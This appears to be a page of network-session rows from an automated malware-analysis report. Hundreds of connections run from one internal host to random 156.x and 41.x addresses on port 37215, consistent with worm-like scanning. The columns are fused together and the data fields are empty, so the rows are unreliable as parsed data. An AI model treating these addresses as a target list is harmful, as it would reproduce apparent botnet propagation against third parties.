                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6496192.168.2.1556954156.64.251.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6497192.168.2.1536554156.70.12.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6498192.168.2.1552392156.170.193.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6499192.168.2.1549712156.121.197.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6500192.168.2.1548130156.4.77.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6501192.168.2.1548838156.40.209.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6502192.168.2.1543860156.121.170.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6503192.168.2.1550690156.64.208.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6504192.168.2.1560772156.213.233.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6505192.168.2.1548476156.242.75.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6506192.168.2.1546342156.14.124.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6507192.168.2.1534598156.250.194.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6508192.168.2.1547308156.167.36.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6509192.168.2.1533498156.116.12.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6510192.168.2.1556098156.81.133.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6511192.168.2.1545916156.10.61.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6512192.168.2.1542694156.43.2.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6513192.168.2.1551594156.85.74.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6514192.168.2.1557412156.69.147.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6515192.168.2.1559070156.2.216.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6516192.168.2.1535150156.90.119.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6517192.168.2.1558084156.241.70.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6518192.168.2.1537886156.21.0.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6519192.168.2.1550728156.232.13.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6520192.168.2.1540142156.92.68.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6521192.168.2.1554704156.67.119.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6522192.168.2.1554266156.224.56.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6523192.168.2.1559784156.191.181.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6524192.168.2.1544094156.169.248.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6525192.168.2.1537942156.52.236.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6526192.168.2.1548158156.159.224.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6527192.168.2.1536210156.133.178.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6528192.168.2.1547910156.206.58.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6529192.168.2.1543324156.125.67.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6530192.168.2.1550820156.213.18.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6531192.168.2.1534986156.56.118.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6532192.168.2.1533490156.249.230.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6533192.168.2.1551626156.4.185.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6534192.168.2.1555364156.81.112.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6535192.168.2.1548680156.113.98.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6536192.168.2.1542986156.149.7.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6537192.168.2.1533172156.62.22.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6538192.168.2.1554206156.166.149.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6539192.168.2.1533568156.174.52.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6540192.168.2.1558412156.209.95.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6541192.168.2.1543366156.24.181.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6542192.168.2.1535530156.165.248.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6543192.168.2.1558628156.29.32.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6544192.168.2.1549806156.127.136.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6545192.168.2.1556486156.193.250.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6546192.168.2.1544740156.191.53.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6547192.168.2.1533152156.214.133.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6548192.168.2.1542758156.147.223.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6549192.168.2.1558798156.160.8.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6550192.168.2.1542116156.4.3.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6551192.168.2.1539388156.127.78.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6552192.168.2.1537648156.69.235.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6553192.168.2.1551010156.214.231.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6554192.168.2.1533566156.225.75.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6555192.168.2.1549684156.205.113.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6556192.168.2.1549254156.159.118.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6557192.168.2.1535706156.156.239.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6558192.168.2.1534298156.194.208.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6559192.168.2.1539108156.49.35.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6560192.168.2.1554730156.117.38.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6561192.168.2.1534362156.138.179.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6562192.168.2.1548768156.71.115.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6563192.168.2.1554932156.213.196.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6564192.168.2.1533722156.77.251.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6565192.168.2.1544010156.173.139.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6566192.168.2.1543728156.108.94.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6567192.168.2.1538112156.13.153.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6568192.168.2.1560764156.75.126.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6569192.168.2.1534478156.172.121.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6570192.168.2.1545144156.43.60.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6571192.168.2.1550698156.154.159.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6572192.168.2.1536630156.247.2.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6573192.168.2.1551008156.241.69.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6574192.168.2.1533246156.100.172.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6575192.168.2.1550516156.90.102.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6576192.168.2.1552820156.203.158.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6577192.168.2.1554944156.157.91.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6578192.168.2.1550378156.56.135.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6579192.168.2.1550476156.240.188.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6580192.168.2.1544434156.15.96.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6581192.168.2.1546586156.145.6.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6582192.168.2.1542590156.210.211.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6583192.168.2.1538434156.241.129.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6584192.168.2.1546266156.56.162.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6585192.168.2.1534396156.192.152.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6586192.168.2.1556398156.1.29.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6587192.168.2.1548762156.140.8.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6588192.168.2.1560818156.136.148.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6589192.168.2.1549528156.152.120.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6590192.168.2.1535480156.20.8.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6591192.168.2.1546412156.252.52.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6592192.168.2.1537830156.92.99.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6593192.168.2.1552262156.224.126.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6594192.168.2.1553996156.69.245.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6595192.168.2.1547732156.2.102.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6596192.168.2.154680641.75.15.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6597192.168.2.154551041.104.136.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6598192.168.2.155783041.181.107.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6599192.168.2.153890641.138.140.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6600192.168.2.154448241.179.128.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6601192.168.2.155202841.123.51.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6602192.168.2.154995841.74.238.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6603192.168.2.155698441.5.94.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6604192.168.2.153889841.194.241.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6605192.168.2.156055641.17.45.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6606192.168.2.154901841.102.106.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6607192.168.2.153544641.148.207.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6608192.168.2.155325441.58.87.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6609192.168.2.153717841.6.150.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6610192.168.2.153721441.44.232.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6611192.168.2.155896241.57.62.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6612192.168.2.155748441.233.220.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6613192.168.2.155724441.37.23.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6614192.168.2.154985241.155.250.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6615192.168.2.154746841.169.241.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6616192.168.2.155484441.198.15.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6617192.168.2.154897841.226.252.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6618192.168.2.154654441.20.155.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6619192.168.2.153379841.152.25.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6620192.168.2.155879841.33.80.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6621192.168.2.153343841.159.127.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6622192.168.2.155696641.103.251.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6623192.168.2.155853641.243.4.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6624192.168.2.154213041.52.97.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6625192.168.2.153697641.253.200.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6626192.168.2.154408841.247.158.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6627192.168.2.155109641.238.40.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6628192.168.2.154214241.107.6.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6629192.168.2.154496441.243.45.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6630192.168.2.154508841.132.65.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6631192.168.2.153534041.53.188.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6632192.168.2.155307441.70.239.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6633192.168.2.155975841.199.107.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6634192.168.2.155793241.32.74.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6635192.168.2.156082241.237.16.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6636192.168.2.154589641.148.62.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6637192.168.2.153711041.178.43.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6638192.168.2.155853041.235.176.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6639192.168.2.153476641.8.174.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6640192.168.2.154054041.29.19.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6641192.168.2.154478041.113.35.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6642192.168.2.153439841.58.17.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6643192.168.2.153628641.133.186.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6644192.168.2.154493241.227.9.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6645192.168.2.154408841.240.183.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6646192.168.2.153742041.182.33.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6647192.168.2.155120041.208.151.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6648192.168.2.155975841.177.183.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6649192.168.2.153372841.10.148.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6650192.168.2.154810241.25.178.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6651192.168.2.154392041.73.231.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6652192.168.2.153283641.218.128.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6653192.168.2.155874641.103.210.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6654192.168.2.155826241.73.55.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6655192.168.2.154408641.42.230.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6656192.168.2.153815241.142.201.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6657192.168.2.153613841.253.244.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6658192.168.2.154862241.160.6.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6659192.168.2.155145641.144.72.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6660192.168.2.154044441.141.172.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6661192.168.2.155414241.51.61.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6662192.168.2.155947841.43.193.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6663192.168.2.153830641.78.111.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6664192.168.2.155241241.230.46.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6665192.168.2.155871241.250.145.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6666192.168.2.153956441.184.33.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6667192.168.2.155652241.45.65.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6668192.168.2.154458241.100.148.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6669192.168.2.154306241.60.190.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6670192.168.2.153471841.128.183.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6671192.168.2.154076041.249.131.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6672192.168.2.155445241.179.19.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6673192.168.2.153352241.151.194.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6674192.168.2.154596441.2.184.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6675192.168.2.153302641.235.1.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6676192.168.2.153432241.49.107.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6677192.168.2.155699441.197.107.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6678192.168.2.155394241.233.3.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6679192.168.2.155789841.128.30.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6680192.168.2.155287641.99.241.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6681192.168.2.155671241.110.138.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6682192.168.2.154716241.49.136.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6683192.168.2.153634441.30.22.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6684192.168.2.155310241.170.153.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6685192.168.2.153373441.132.236.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6686192.168.2.153498241.241.25.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6687192.168.2.154256841.153.19.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6688192.168.2.154483841.254.196.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6689192.168.2.156079441.184.4.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6690192.168.2.155496441.0.104.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6691192.168.2.153784841.181.62.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6692192.168.2.154657841.27.87.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6693192.168.2.154312041.186.148.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6694192.168.2.155242641.177.203.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6695192.168.2.153861041.129.224.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6696192.168.2.153756041.231.230.8137215
                                                                            TimestampBytes transferredDirectionData


